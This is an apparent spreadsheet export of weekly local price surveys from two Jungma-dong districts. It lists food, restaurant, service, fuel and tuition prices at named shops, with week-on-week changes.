[8,"소주","1병 360㎖\n(병 보증금 포함)",2,2,{"v":1675,"d":"1,675"},{"v":1625,"d":"1,625"},-50,"참마트",{"v":1700,"d":"1,700"},{"v":1600,"d":"1,600"},-100,"백운마트",{"v":1650,"d":"1,650"},{"v":1650,"d":"1,650"},0]
[9,"등유","주유소 판매 1ℓ",2,2,{"v":1350,"d":"1,350"},{"v":1350,"d":"1,350"},0,"원예농협백운점",{"v":1400,"d":"1,400"},{"v":1400,"d":"1,400"},0,"사곡주유소",{"v":1300,"d":"1,300"},{"v":1300,"d":"1,300"},0]
[10,"경유","주유소 판매 1ℓ",2,2,{"v":1470,"d":"1,470"},{"v":1470,"d":"1,470"},0,"원예농협백운점",{"v":1465,"d":"1,465"},{"v":1465,"d":"1,465"},0,"사곡주유소",{"v":1475,"d":"1,475"},{"v":1475,"d":"1,475"},0]
[11,"휘발유","주유소 판매 1ℓ\n(무연)",2,2,{"v":1545,"d":"1,545"},{"v":1560,"d":"1,560"},15,"원예농협백운점",{"v":1545,"d":"1,545"},{"v":1545,"d":"1,545"},0,"사곡주유소",{"v":1545,"d":"1,545"},{"v":1575,"d":"1,575"},30]
[12,"피아노\n학원비","관인학원\n(초급반 1개월)",2,2,{"v":145805,"d":"145,805"},{"v":145805,"d":"145,805"},0,"엘리제피아노",{"v":141610,"d":"141,610"},{"v":141610,"d":"141,610"},0,"목원피아노",{"v":150000,"d":"150,000"},{"v":150000,"d":"150,000"},0]
[13,"미술학원비","초등 저학년 1개월\n(재료비 포함)",2,2,{"v":135000,"d":"135,000"},{"v":135000,"d":"135,000"},0,"수채화",{"v":130000,"d":"130,000"},{"v":130000,"d":"130,000"},0,"색채학",{"v":140000,"d":"140,000"},{"v":140000,"d":"140,000"},0]

{"sheet":"중마동1","index":3,"n_rows":98,"n_cols":16,"rows_kept":98,"merged":[[1,0,1,15],[2,0,2,6],[3,0,4,0],[3,1,4,1],[3,2,4,2],[3,5,3,7],[3,8,3,11],[3,12,3,15],[5,0,5,2],[34,0,34,2],[84,0,84,2]]}
[]
[" 주간 물간동향 (중마동1)"]
[{"$nulls":12},"조사자 : 조영희"]
["연번","품목","규격·단위",null,null,"평     균",null,null,"조 사 1 지 역(농협하나로마트)",{"$nulls":3},"조 사 2 지 역(홈플러스)"]
[{"$nulls":5},"전주","금주","증감액","조 사 처","전주","금주","증감액","조 사 처","전주","금주","증감액"]
["농·축·수산물(28개 품목)"]
[1,"쌀","일반미 20kg",{"$f":"COUNTIF(J7,\"<>0\")+COUNTIF(N7,\"<>0\")","v":2},2,{"$f":"IF(D7=0,0,SUM(J7,N7)/D7)","v":{"v":64450,"d":"64,450"}},{"v":64450,"d":"64,450"},{"$f":"G7-F7","v":0},"농협하나로마트",64000,64000,0,"홈플러스",64900,64900,{"$f":"O7-N7","v":0}]
[2,"무","상품 1개(1㎏)",2,2,{"v":1500,"d":"1,500"},{"v":1245,"d":"1,245"},-255,"농협하나로마트",1600,1100,{"$f":"K8-J8","v":-500},"홈플러스",1400,1390,-10]
[3,"상추","잎상추 500g",2,2,{"v":7000,"d":"7,000"},{"v":9725,"d":"9,725"},{"v":2725,"d":"2,725"},"농협하나로마트",6500,5500,-1000,"홈플러스",7500,13950,6450]
[4,"양상추","상품1개(500g)",2,2,{"v":2945,"d":"2,945"},{"v":2995,"d":"2,995"},50,"농협하나로마트",3300,3000,-300,"홈플러스",2590,2990,400]
[5,"애호박","상품1개(250~300g)",2,2,{"v":2985,"d":"2,985"},{"v":3235,"d":"3,235"},250,"농협하나로마트",2980,3480,500,"홈플러스",2990,2990,0]
[6,"열무","상품 4kg(1단)",1,1,{"v":21000,"d":"21,000"},{"v":22000,"d":"22,000"},{"v":1000,"d":"1,000"},"농협하나로마트",0,0,0,"홈플러스",21000,22000,1000]
[7,"양파","1망 1kg",2,2,{"v":3350,"d":"3,350"},{"v":3350,"d":"3,350"},0,"농협하나로마트",3500,3500,0,"홈플러스",3200,3200,0]
[8,"오이","상품 3개",2,2,{"v":5370,"d":"5,370"},{"v":5510,"d":"5,510"},140,"농협하나로마트",5250,5040,-210,"홈플러스",5490,5980,490]
[9,"풋고추","신선한것 1kg",2,2,{"v":14250,"d":"14,250"},{"v":25015,"d":"25,015"},{"v":10765,"d":"10,765"},"농협하나로마트",15000,23500,8500,"홈플러스",13500,26530,13030]
[10,"마늘","깐것 상품 1kg",2,2,{"v":9245,"d":"9,245"},{"v":8695,"d":"8,695"},-550,"농협하나로마트",8500,9500,1000,"홈플러스",9990,7890,-2100]
[11,"감자","흰색 1kg",2,2,{"v":5545,"d":"5,545"},{"v":5660,"d":"5,660"},115,"농협하나로마트",5300,6000,700,"홈플러스",5790,5320,-470]
[12,"배추","1포기 3kg",2,2,{"v":3380,"d":"3,380"},{"v":3850,"d":"3,850"},470,"농협하나로마트",3260,3500,240,"홈플러스",3500,4200,700]
[13,"콩나물","1봉지 500g ",2,2,{"v":2235,"d":"2,235"},{"v":2235,"d":"2,235"},0,"농협하나로마트",1980,1980,0,"홈플러스",2490,2490,0]
[14,"사과","상품 1개(300∼350g)",2,2,{"v":3795,"d":"3,795"},{"v":4600,"d":"4,600"},805,"농협하나로마트",3990,4900,910,"홈플러스",3600,4300,700]
[15,"배","상품 1개(650∼700g)",2,2,{"v":5890,"d":"5,890"},{"v":6100,"d":"6,100"},210,"농협하나로마트",5980,5500,-480,"홈플러스",5800,6700,900]
[16,"바나나","상품 1kg",2,2,{"v":3740,"d":"3,740"},{"v":3870,"d":"3,870"},130,"농협하나로마트",3490,3750,260,"홈플러스",3990,3990,0]
[17,"쇠고기\n(한우)","등심 600g(상등육)",2,2,{"v":54400,"d":"54,400"},{"v":60900,"d":"60,900"},{"v":6500,"d":"6,500"},"농협하나로마트",49800,49800,0,"홈플러스",59000,72000,13000]
[18,"쇠고기\n(수입육)","등심 600g(상등육)",2,2,{"v":11100,"d":"11,100"},{"v":11100,"d":"11,100"},0,"농협하나로마트",null,null,0,"홈플러스",22200,22200,0]
[19,"돼지고기","삼겹살 600g(상등육)",2,2,{"v":13390,"d":"13,390"},{"v":14880,"d":"14,880"},{"v":1490,"d":"1,490"},"농협하나로마트",11880,12960,1080,"홈플러스",14900,16800,1900]
[20,"닭고기","육계 1마리(1kg 정도)",2,2,{"v":7845,"d":"7,845"},{"v":8495,"d":"8,495"},650,"농협하나로마트",7700,7000,-700,"홈플러스",7990,9990,2000]
[21,"달걀","특란 30개 한판",2,2,{"v":7595,"d":"7,595"},{"v":8195,"d":"8,195"},600,"농협하나로마트",8200,8200,null,"홈플러스",6990,8190,1200]
[22,"조기","15cm 1마리",2,2,{"v":2390,"d":"2,390"},{"v":2735,"d":"2,735"},345,"농협하나로마트",2800,2980,0,"홈플러스",1980,2490,510]
[23,"갈치","60cm 1마리",2,2,{"v":8070,"d":"8,070"},{"v":10050,"d":"10,050"},{"v":1980,"d":"1,980"},"농협하나로마트",6900,6900,{"$f":"K29-J29","v":0},"홈플러스",9240,13200,3960]
[24,"명태","40cm 1마리",2,2,{"v":3045,"d":"3,045"},{"v":3500,"d":"3,500"},455,"농협하나로마트",3500,3500,0,"홈플러스",2590,3500,910]
[25,"고등어","30cm 1마리",2,2,{"v":3025,"d":"3,025"},{"v":4440,"d":"4,440"},{"v":1415,"d":"1,415"},"농협하나로마트",2900,3980,{"$f":"K31-J31","v":1080},"홈플러스",3150,4900,1750]
[26,"냉동오징어","30cm 1마리",2,2,{"v":6995,"d":"6,995"},{"v":6960,"d":"6,960"},-35,"농협하나로마트",6000,6000,{"$f":"K32-J32","v":0},"홈플러스",7990,7920,-70]
[27,"콩","상품 1kg",2,2,{"v":17350,"d":"17,350"},{"v":14675,"d":"14,675"},{"v":-2675,"d":"-2,675"},"농협하나로마트",19800,14450,{"$f":"K33-J33","v":-5350},"홈플러스",14900,14900,0]
[28,"고춧가루","상품 3kg",2,2,{"v":99560,"d":"99,560"},{"v":99560,"d":"99,560"},0,"농협하나로마트",102000,102000,0,"홈플러스",97120,97120,{"$f":"O34-N34","v":0}]
["개인서비스 요금(49개 품목)"]
[1,"설렁탕","1인분 (보통)",{"$f":"COUNTIF(J36,\"<>0\")+COUNTIF(N36,\"<>0\")","v":2},2,{"$f":"IF(D36=0,0,SUM(J36,N36)/D36)","v":{"v":10500,"d":"10,500"}},{"v":10500,"d":"10,500"},{"$f":"G36-F36","v":0},"큰집설렁탕",10000,10000,{"$f":"K36-J36","v":0},"서울깍두기",11000,11000,{"$f":"O36-N36","v":0}]
[2,"냉면","물냉면, 1인분(보통)",2,2,{"v":9500,"d":"9,500"},{"v":9500,"d":"9,500"},0,"옥천냉면",9000,9000,0,"은성면옥",10000,10000,0]
[3,"비빔밥","1인분(보통)",2,2,{"v":8500,"d":"8,500"},{"v":8500,"d":"8,500"},0,"백운마루",8000,8000,0,"고을팥죽",9000,9000,0]
[4,"갈비탕","1인분(보통)",2,2,{"v":13500,"d":"13,500"},{"v":13500,"d":"13,500"},0,"청주본가",13000,13000,0,"은성면옥",14000,14000,0]
[5,"삼계탕","1인분(보통)",2,2,{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},0,"고려삼계탕",15000,15000,0,"석암정",15000,15000,0]
[6,"된장찌개\n백반","1인분(보통)",2,2,{"v":8500,"d":"8,500"},{"v":8500,"d":"8,500"},0,"남이식당",8000,8000,0,"한일식당",9000,9000,0]
[7,"김치찌개\n백반","1인분(보통)",2,2,{"v":9500,"d":"9,500"},{"v":9500,"d":"9,500"},0,"시골밥상",9000,9000,0,"한일식당",10000,10000,0]
[8,"불고기","1인분(200g)\n공기밥 제외",2,2,{"v":21500,"d":"21,500"},{"v":21500,"d":"21,500"},0,"금정불고기",19000,19000,0,"한우관",24000,24000,0]
[9,"등심구이","1인분(200g)\n공기밥 제외",2,2,{"v":38000,"d":"38,000"},{"v":38000,"d":"38,000"},0,"한마음회관",40000,40000,0,"한우관",36000,36000,0]
[10,"생선초밥","1인분(보통), 활어기준",2,2,{"v":15500,"d":"15,500"},{"v":15500,"d":"15,500"},0,"거인초밥",12000,12000,0,"거북이초밥",19000,19000,0]
[11,"튀김닭","양념통닭 1마리",2,2,{"v":18500,"d":"18,500"},{"v":18500,"d":"18,500"},0,"아주커치킨",18000,18000,0,"페리카나",19000,19000,0]
[12,"칼국수","1인분(보통)",2,2,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"소담칼국수",8000,8000,0,"민속칼국수",8000,8000,0]
[13,"조리라면","분식점 1인분",2,2,{"v":3650,"d":"3,650"},{"v":3650,"d":"3,650"},0,"농협하나로분식",3500,3500,0,"고봉민김밥",3800,3800,0]
[14,"김밥","분식점 1인분",2,2,{"v":3750,"d":"3,750"},{"v":3750,"d":"3,750"},0,"농협하나로분식",3000,3000,0,"김가네",4500,4500,0]
[15,"짜장면","1인분(보통)",2,2,{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0,"마동짬뽕",7000,7000,0,"연경",7000,7000,0]
[16,"짬뽕","1인분(보통)",2,2,{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},0,"마동짬뽕",10000,10000,0,"연경",8000,8000,0]
[17,"탕수육","일반탕수육(보통)",2,2,{"v":21500,"d":"21,500"},{"v":21500,"d":"21,500"},0,"마동짬봉",22000,22000,0,"연경",21000,21000,0]
[18,"돈가스","일반돈가스,1인분",2,2,{"v":9750,"d":"9,750"},{"v":9750,"d":"9,750"},0,"거인초밥",9000,9000,0,"스타카츠",10500,10500,0]
[19,"햄버거","기본형(야채,고기)",2,2,{"v":3150,"d":"3,150"},{"v":3150,"d":"3,150"},0,"롯데리아중동점",3300,3300,0,"맥도날드 광양DT점",3000,3000,0]
[20,"피자","기본형(야채,고기)",2,2,{"v":18950,"d":"18,950"},{"v":18950,"d":"18,950"},0,"임실치즈피자",22900,22900,0,"피자맨",15000,15000,0]
[21,"커피(외식)","일반원두커피",2,2,{"v":3250,"d":"3,250"},{"v":3250,"d":"3,250"},0,"루앤비 마동점",3500,3500,0,"모닝",3000,3000,0]
[22,"국산차(외식)","녹차(티백 또는 잎녹차)",2,2,{"v":3400,"d":"3,400"},{"v":3400,"d":"3,400"},0,"루앤비 마동점",2800,2800,0,"모닝",4000,4000,0]
[23,"삼겹살","식육식당 200g(국내산)",2,2,{"v":15500,"d":"15,500"},{"v":15500,"d":"15,500"},0,"남부촌",15000,15000,0,"대한숯불고기",16000,16000,0]
[24,"돼지갈비","식육식당 200g(국내산)",2,2,{"v":11500,"d":"11,500"},{"v":11500,"d":"11,500"},0,"남부촌",11000,11000,0,"대한숯불고기",12000,12000,0]
[25,"쇠갈비","식육식당 200g(국내산)",2,2,{"v":41000,"d":"41,000"},{"v":41000,"d":"41,000"},0," 하면옥",35000,35000,0,"은성면옥",47000,47000,0]
[26,"생맥주","500CC 1잔",2,2,{"v":3750,"d":"3,750"},{"v":3750,"d":"3,750"},0,"꼬치니",3500,3500,0,"투모아",4000,4000,0]
[27,"공동\n주택관리비","주공 18평1개월\n(공과금 제외)",2,2,{"v":60000,"d":"60,000"},{"v":60000,"d":"60,000"},0,"부영동광2차20평형",65000,65000,0,"금광아파트16평형",55000,55000,0]
[28,"양 복\n세탁료","신사복 상·하\n드라이크리닝 1회",2,2,{"v":10000,"d":"10,000"},{"v":10000,"d":"10,000"},0,"소망세탁소",10000,10000,0,"무등세탁소",10000,10000,0]
[29,"의복수선료","신사복 바지\n밑단줄임 1회",2,2,{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,"소망세탁소",6000,6000,0,"무등세탁소",6000,6000,0]
[30,"영화관람요\n(방화. 외화)","상영시간 100분정도 1회\n(입장세,문예진흥기금포함)",0,0,0,0,0,null,0,0,0,null,0,0,0]
[31,"경기장\n입장료","공공체육시설\n(성인 1인)",0,0,0,0,0,null,0,0,0,null,0,0,{"$f":"O66-N66","v":0}]
[32,"수영장\n이용료","일반성인 1회\n(체육기금 포함)",0,0,0,0,0,null,0,0,0,null,0,0,0]
[33,"볼링장\n이용료","일반성인\n평일오후 1게임",{"$f":"COUNTIF(J68,\"<>0\")+COUNTIF(N68,\"<>0\")","v":1},1,0,0,0,{"$nulls":3},0,null,0,0,0]
[34,"골프연습장\n이용료","초급(남자회원)1개월\n(레슨비 미포함)",2,2,{"v":147500,"d":"147,500"},{"v":147500,"d":"147,500"},0,"최은규골프클리닉",130000,130000,0,"미가로골프연습장",165000,165000,0]
[35,"노래방\n이용료","일반인 저녁 1시간",2,2,{"v":25000,"d":"25,000"},{"v":25000,"d":"25,000"},0,"세븐노래방",25000,25000,0,"압구정노래연습장",25000,25000,0]
[36,"당구장\n이용료","큐선대 일반인 저녁\n1시간",2,2,{"v":10400,"d":"10,400"},{"v":10400,"d":"10,400"},0,"세리당구장",10800,10800,0,"청솔당구장",10000,10000,0]
[37,"사진촬영료","칼라 반명함 1조\n(상급사진관 3x4)",2,2,{"v":19000,"d":"19,000"},{"v":19000,"d":"19,000"},0,"세원스튜디오",20000,20000,0,"조민철사진이야기",18000,18000,0]
[38,"사진인화료","디지털사진인화요금,\n현상료 포함",2,2,450,450,0,"세원스튜디오",500,500,0,"조민철사진이야기",400,400,0]
[39,"영상매체대여료","최신판 영화 DVD대여요금",0,0,0,0,0,null,0,0,0,null,0,0,0]
[40,"이용료(컷트)","성인조발 중류급 1회",{"$f":"COUNTIF(J75,\"<>0\")+COUNTIF(N75,\"<>0\")","v":2},2,{"v":18000,"d":"18,000"},{"v":18000,"d":"18,000"},0,"광명이용원",18000,18000,0,"농협이발소",18000,18000,0]
[41,"미용료","성인여자 파마(일반)",2,2,{"v":42500,"d":"42,500"},{"v":42500,"d":"42,500"},0,"가위연가",40000,40000,0,"자르지오",45000,45000,0]
[42,"목욕료\n(성인)","대중탕(성인 1회)\n(1회용품 제외)",1,1,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,null,0,0,0,"가야천사우나",8000,8000,0]
[43,"숙박료\n(호텔)","평일, 스탠다드,부가세 및 봉사료 포함",1,1,90000,90000,0,"호텔락희 광양점",90000,90000,0,null,0,0,0]
[44,"숙박료\n(여관)","독방, 1박, 욕탕부설",2,2,{"v":52500,"d":"52,500"},{"v":52500,"d":"52,500"},0,"보스톤",55000,55000,0,"블루밍모텔",50000,50000,0]
[45,"콘도미니엄\n이용료","25평정도 회원기준\n1실 1일 사용",0,0,0,0,0,null,0,0,0,null,0,0,0]
[46,"PC방\n이용료","1회 이용시",2,2,{"v":1200,"d":"1,200"},{"v":1200,"d":"1,200"},0,"딜라이트pc방",1200,1200,0,"크라우드pc방",1200,1200,0]
[47,"택배이용료","20kg이하, 타지역",2,2,{"v":6250,"d":"6,250"},{"v":6250,"d":"6,250"},0,"우체국",6500,6500,0,"현대택배",6000,6000,0]
[48,"찜질방\n이용료","찜질방(성인 1회)\n(1회용품 제외)",0,1,0,0,0,null,0,0,0,null,0,null,0]
[49,"대입학원비(종합)","대입(4년제)재수생 종합반 수강료",0,1,0,0,0,null,0,0,0,null,0]
["공산품 등 기타(13개품목)"]
[1,"밀가루","중력분 1등품\n(1봉지 3kg)",{"$f":"COUNTIF(J86,\"<>0\")+COUNTIF(N86,\"<>0\")","v":2},2,{"$f":"IF(D86=0,0,SUM(J86,N86)/D86)","v":{"v":5700,"d":"5,700"}},{"v":5700,"d":"5,700"},{"$f":"G86-F86","v":0},"농협하나로마트",5700,5700,{"$f":"K86-J86","v":0},"홈플러스",5700,5700,{"$f":"O86-N86","v":0}]
[2,"두부","공장제품 1모",2,2,{"v":1590,"d":"1,590"},{"v":1625,"d":"1,625"},35,"농협하나로마트",1480,1550,70,"홈플러스",1700,1700,0]
[3,"우유","흰 우유(종이팩) 1개\n200㎖",2,2,{"v":1070,"d":"1,070"},{"v":1070,"d":"1,070"},0,"농협하나로마트",1080,1080,0,"홈플러스",1060,1060,0]
[4,"식용유","콩기름 1.8ml",2,2,{"v":8480,"d":"8,480"},{"v":8480,"d":"8,480"},0,"농협하나로마트",8480,8480,0,"홈플러스",8480,8480,0]
[5,"설탕","정백당 1kg",2,2,{"v":2380,"d":"2,380"},{"v":2380,"d":"2,380"},0,"농협하나로마트",2380,2380,0,"홈플러스",2380,2380,0]
[6,"생수","플라스틱 1병(500㎖)",2,2,455,455,0,"농협하나로마트",480,480,0,"홈플러스",430,430,0]
[7,"맥주","1병 500㎖\n(병 보증금 포함)",2,2,{"v":1695,"d":"1,695"},{"v":1695,"d":"1,695"},0,"농협하나로마트",1670,1670,0,"홈플러스",1720,1720,0]
[8,"소주","1병 360㎖\n(병 보증금 포함)",2,2,{"v":1345,"d":"1,345"},{"v":1345,"d":"1,345"},0,"농협하나로마트",1340,1340,0,"홈플러스",1350,1350,0]
[9,"등유","주유소 판매 1ℓ",0,0,0,0,0,"S-oil 매일주유소",0,0,0,"GS희망찬주유소",0,0,0]
[10,"경유","주유소 판매 1ℓ",2,2,{"v":1503.5,"d":"1,504"},{"v":1503.5,"d":"1,504"},0,"S-oil 매일주유소",1529,1529,{"$f":"K95-J95","v":0},"GS희망찬주유소",1478,1478,0]
[11,"휘발유","주유소 판매 1ℓ\n(무연)",2,2,{"v":1578,"d":"1,578"},{"v":1588.5,"d":"1,589"},{"v":10.5,"d":"11"},"S-oil 매일주유소",1599,1599,{"$f":"K96-J96","v":0},"GS희망찬주유소",1557,1578,21]
[12,"피아노\n학원비","관인학원\n(초급반 1개월)",2,2,{"v":150000,"d":"150,000"},{"v":150000,"d":"150,000"},0,"클라라피아노",150000,150000,{"$f":"K97-J97","v":0},"바하의 아이들",150000,150000,0]
[13,"미술학원비","초등 저학년 1개월\n(재료비 포함)",2,2,{"v":155000,"d":"155,000"},{"v":155000,"d":"155,000"},{"$f":"G98-F98","v":0},"파란미술학원",150000,150000,{"$f":"K98-J98","v":0},"꿈나무미술학원",160000,160000,0]

{"sheet":"중마동2","index":4,"n_rows":98,"n_cols":16,"rows_kept":98,"merged":[[1,0,1,15],[2,0,2,6],[2,12,2,13],[3,0,4,0],[3,1,4,1],[3,2,4,2],[3,5,3,7],[3,8,3,11],[3,12,3,15],[5,0,5,2],[34,0,34,2],[84,0,84,2]]}
[]
["주  간  물  가  동  향(중마동2)"]
[{"$nulls":12},"조사자 : 김성주"]
["연번","품목","규격·단위",null,null,"평     균",null,null,"조 사 1 지 역(와이마트)",{"$nulls":3},"조 사 2 지 역(중마시장)"]
[{"$nulls":5},"전주","금주","증감액","조 사 처","전주","금주","증감액","조 사 처","전주","금주","증감액"]
["농·축·수산물(28개 품목)"]
[1,"쌀","일반미20 (kg)",{"$f":"COUNTIF(J7,\"<>0\")+COUNTIF(N7,\"<>0\")","v":2},2,{"$f":"IF(D7=0,0,SUM(J7,N7)/D7)","v":59900},59900,{"$f":"G7-F7","v":0},"와이마트",59800,59800,{"$f":"K7-J7","v":0},"중마시장",{"v":60000,"d":"60,000"},{"v":60000,"d":"60,000"},{"$f":"O7-N7","v":0}]
[2,"무","상품 1개(1㎏)",2,2,1350,1700,350,"와이마트",1200,1400,200,"중마시장",{"v":1500,"d":"1,500"},{"v":2000,"d":"2,000"},500]
[3,"상추","잎상추 500g",2,2,5450,5200,-250,"와이마트",7900,6400,-1500,"중마시장",{"v":3000,"d":"3,000"},{"v":4000,"d":"4,000"},1000]
[4,"양상추","상품1개(500g)",2,2,3750,3500,-250,"와이마트",3500,3000,-500,"중마시장",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0]
[5,"애호박","상품1개(250~300g)",2,2,3350,3350,0,"와이마트",3700,3700,0,"중마시장",{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0]
[6,"열무","상품 4kg(1단)",1,1,17000,16000,-1000,"와이마트",0,0,0,"중마시장",{"v":14000,"d":"14,000"},{"v":16000,"d":"16,000"},2000]
[7,"양파","1망 1kg",2,2,2990,2990,0,"와이마트",2980,2980,0,"중마시장",{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0]
[8,"오이","상품 3개",2,2,5250,5700,450,"와이마트",4500,5400,900,"중마시장",{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0]
[9,"풋고추","신선한것 1kg",2,2,18500,18500,0,"와이마트",19000,19000,0,"중마시장",{"v":18000,"d":"18,000"},{"v":18000,"d":"18,000"},0]
[10,"마늘","깐것 상품 1kg",2,2,8900,8900,0,"와이마트",9800,9800,0,"중마시장",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0]
[11,"감자","흰색 1kg",2,2,3000,3740,740,"와이마트",3500,3480,-20,"중마시장",{"v":2500,"d":"2,500"},{"v":4000,"d":"4,000"},1500]
[12,"배추","1포기 3kg",2,2,3450,3750,300,"와이마트",3900,4500,600,"중마시장",{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0]
[13,"콩나물","1봉지 500g ",2,2,1650,1650,0,"와이마트",2300,2300,0,"중마시장",{"v":1000,"d":"1,000"},{"v":1000,"d":"1,000"},0]
[14,"사과","상품 1개(300∼350g)",2,2,4000,4150,150,"와이마트",4500,4900,400,"중마시장",{"v":3500,"d":"3,500"},{"v":3400,"d":"3,400"},-100]
[15,"배","상품 1개(650∼700g)",2,2,4000,4000,0,"와이마트",4000,4000,0,"중마시장",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0]
[16,"바나나","상품 1kg",2,2,3745,3750,5,"와이마트",3490,3500,10,"중마시장",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0]
[17,"쇠고기\n(한우)","등심 600g(상등육)",2,2,73200,67200,-6000,"와이마트",87000,87000,0,"롯데슈퍼",{"v":59400,"d":"59,400"},{"v":47400,"d":"47,400"},-12000]
[18,"쇠고기\n(수입육)","등심 600g(상등육)",0,0,0,0,0,"와이마트",0,0,0,"롯데슈퍼",0,0,0]
[19,"돼지고기","삼겹살 600g(상등육)",2,2,12810,12240,-570,"와이마트",13080,11940,-1140,"롯데슈퍼",{"v":12540,"d":"12,540"},{"v":12540,"d":"12,540"},0]
[20,"닭고기","육계 1마리(1kg 정도)",2,2,{"$f":"IF(D26=0,0,SUM(J26,N26)/D26)","v":7950},{"$f":"IF(E26=0,0,SUM(K26,O26)/E26)","v":7950},0,"와이마트",6900,6900,0,"중마시장",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},0]
[21,"달걀","특란 30개 한판",2,2,{"$f":"IF(D27=0,0,SUM(J27,N27)/D27)","v":8475},8475,0,"와이마트",7950,7950,0,"중마시장",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},0]
[22,"조기","15cm 1마리",2,2,1405,1405,0,"와이마트",1150,1150,0,"중마시장",{"v":1660,"d":"1,660"},{"v":1660,"d":"1,660"},0]
[23,"갈치","60cm 1마리",2,2,15250,19250,4000,"와이마트",13500,13500,0,"중마시장",{"v":20000,"d":"20,000"},{"v":25000,"d":"25,000"},5000]
[24,"명태","40cm 1마리",2,2,4450,4950,500,"와이마트",4900,4900,0,"중마시장",{"v":4000,"d":"4,000"},{"v":5000,"d":"5,000"},1000]
[25,"고등어","30cm 1마리",2,2,4600,4600,0,"와이마트",5800,5800,0,"중마시장",{"v":3400,"d":"3,400"},{"v":3400,"d":"3,400"},0]
[26,"냉동오징어","30cm 1마리",2,2,6885,6405,-480,"와이마트",6770,5810,-960,"중마시장",{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0]
[27,"콩","상품 1kg",2,2,11900,11850,-50,"와이마트",14800,14800,0,"중마시장",7000,8900,1900]
[28,"고춧가루","상품 3kg",2,2,81250,89750,8500,"와이마트",89500,89500,0,"중마시장",90000,90000,0]
["개인서비스 요금(49개 품목)"]
[1,"설렁탕","1인분 (보통)",{"$f":"COUNTIF(J36,\"<>0\")+COUNTIF(N36,\"<>0\")","v":2},2,{"$f":"IF(D36=0,0,SUM(J36,N36)/D36)","v":11000},11000,{"$f":"G36-F36","v":0},"큰집설렁탕",10000,10000,{"$f":"K36-J36","v":0},"종가집설렁탕",12000,12000,{"$f":"O36-N36","v":0}]
[2,"냉면","물냉면, 1인분(보통)",2,2,10500,10500,0,"황초갈비냉면",10000,10000,0,"진주황포냉면",11000,11000,0]
[3,"비빔밥","1인분(보통)",2,2,8250,8250,0,"김밥천국",7500,7500,0,"광양정",9000,9000,0]
[4,"갈비탕","1인분(보통)",2,2,14500,14500,0,"백운목장",14000,14000,0,"바우네나주곰탕",15000,15000,0]
[5,"삼계탕","1인분(보통)",2,2,15500,15500,0,"지호삼계탕",17000,17000,0,"대복삼계탕",14000,14000,0]
[6,"된장찌개\n백반","1인분(보통)",2,2,8000,8000,0,"덕이네식당",8000,8000,0,"맛사랑",8000,8000,0]
[7,"김치찌개\n백반","1인분(보통)",2,2,8000,8000,0,"판문점",8000,8000,0,"맛사랑",8000,8000,0]
[8,"불고기","1인분(200g)\n공기밥 제외",2,2,23500,23500,0,"금정",24000,24000,0,"백운목장",23000,23000,0]
[9,"등심구이","1인분(200g)\n공기밥 제외",2,2,40000,40000,0,"한마음회관",40000,40000,0,"한마당생고기",40000,40000,0]
[10,"생선초밥","1인분(보통), 활어기준",2,2,17500,17500,0,"광양초밥",19000,19000,0,"대길초밥",16000,16000,0]
[11,"튀김닭","양념통닭 1마리",2,2,20000,20000,0,"멕시카나",19000,19000,0,"BHC",21000,21000,0]
[12,"칼국수","1인분(보통)",2,2,8000,8000,0,"밀밭해물칼국수",8000,8000,0,"정인정칼국수",8000,8000,0]
[13,"조리라면","분식점 1인분",2,2,4500,4500,0,"김밥나라중동무등점",4000,4000,0,"김가네",5000,5000,0]
[14,"김밥","분식점 1인분",2,2,3750,3750,0,"김밥나라중동무등점",3500,3500,0,"김가네",4000,4000,0]
[15,"짜장면","1인분(보통)",2,2,5450,5450,0,"봄차이나",5900,5900,0,"시장중화요리",5000,5000,0]
[16,"짬뽕","1인분(보통)",2,2,6950,6950,0,"봄차이나",6900,6900,0,"시장중화요리",7000,7000,0]
[17,"탕수육","일반탕수육(보통)",2,2,19000,19000,0,"봄차이나",21000,21000,0,"시장중화요리",17000,17000,0]
[18,"돈가스","일반돈가스,1인분",2,2,7950,7950,0,"돈비가",7900,7900,0,"용우동",8000,8000,0]
[19,"햄버거","기본형(야채,고기)",2,2,3900,3900,0,"뉴욕버거",3900,3900,0,"맘스터치",3900,3900,0]
[20,"피자","기본형(야채,고기)",2,2,18200,18200,0,"피자마루",16500,16500,0,"청년피자",19900,19900,0]
[21,"커피(외식)","일반원두커피",2,2,3850,3850,0,"이디아커피",3200,3200,0,"엔젤인어스",4500,4500,0]
[22,"국산차(외식)","녹차(티백 또는 잎녹차)",1,1,3200,3200,0,"이디아커피",3200,3200,0,"엔젤인어스",0,0,0]
[23,"삼겹살","식육식당 200g(국내산)",2,2,15716.5,15716.5,0,"한마당생고기",14100,14100,0,"한마음회관",17333,17333,0]
[24,"돼지갈비","식육식당 200g(국내산)",2,2,11500,11500,0,"판문점",10000,10000,0,"한마음회관",13000,13000,0]
[25,"쇠갈비","식육식당 200g(국내산)",0,0,0,0,0,null,0,0,0,null,0,0,0]
[26,"생맥주","500CC 1잔",2,2,3750,3750,0,"투다리",4000,4000,0,"까투리",3500,3500,0]
[27,"공동\n주택관리비","주공 18평1개월\n(공과금 제외)",2,2,71130,71130,0,"주공2차아파트",69460,69460,0,"선우아파트",72800,72800,0]
[28,"양 복\n세탁료","신사복 상·하\n드라이크리닝 1회",2,2,9000,9000,0,"모아모아빨래방",5000,5000,0,"드라이하우스",13000,13000,0]
[29,"의복수선료","신사복 바지\n밑단줄임 1회",2,2,4500,4500,0,"모아모아빨래방",4000,4000,0,"드라이하우스",5000,5000,0]
[30,"영화관람요\n(방화. 외화)","상영시간 100분정도 1회\n(입장세,문예진흥기금포함)",0,0,0,0,0,null,0,0,0,null,0,0,0]
